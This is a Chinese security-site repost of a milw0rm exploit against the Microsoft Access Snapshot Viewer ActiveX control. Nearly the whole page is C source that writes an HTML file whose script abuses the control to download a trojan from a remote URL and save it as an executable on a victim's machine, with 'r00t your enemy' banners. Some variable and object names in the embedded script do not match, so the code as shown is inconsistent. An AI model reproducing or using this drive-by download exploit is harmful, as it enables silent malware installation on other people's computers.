首页 网络安全 安全学院 查看内容

Access中ActiveX远程利用

2008-8-6 11:18 671 0

摘要:  本文来自milw0rm.com /* Microsoft Access Snapshot Viewer ActiveX Control Exploit   Ms-Ace...
关键词: nbsp FILE printf arbitrary Snapshot data Filename Exploit Access destination

 本文来自milw0rm.com /* Microsoft Access Snapshot Viewer ActiveX Control Exploit   Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0   Download nice binaries into an arbitrary box   Vulnerability discovered by Oliver Lavery    http://www.securityfocus.com/bid/8536/info   Remote: Yes   greetz to str0ke */ #include <stdio.h>#include <stdlib.h> #define Filename        "Ms-Access-SnapShot.html" FILE *File;char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>\n"              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"              "<script>\n<html>"; int main (){        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");        printf("**c0ded by callAX**\n");        printf("**r00t your enemy .| **");         FILE *File;        char *b0fer;         if ( (File = fopen(Filename,"w+b")) == NULL ) {                printf("\n fopen() error");                exit(1);        }         b0fer = (char*)malloc(strlen(data));        memcpy(b0fer,data,sizeof(data)-1);         fwrite(b0fer, strlen(data), 1,File);        fclose(File);         printf("\n\n" Filename " has been created.\n");        return 0;}
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部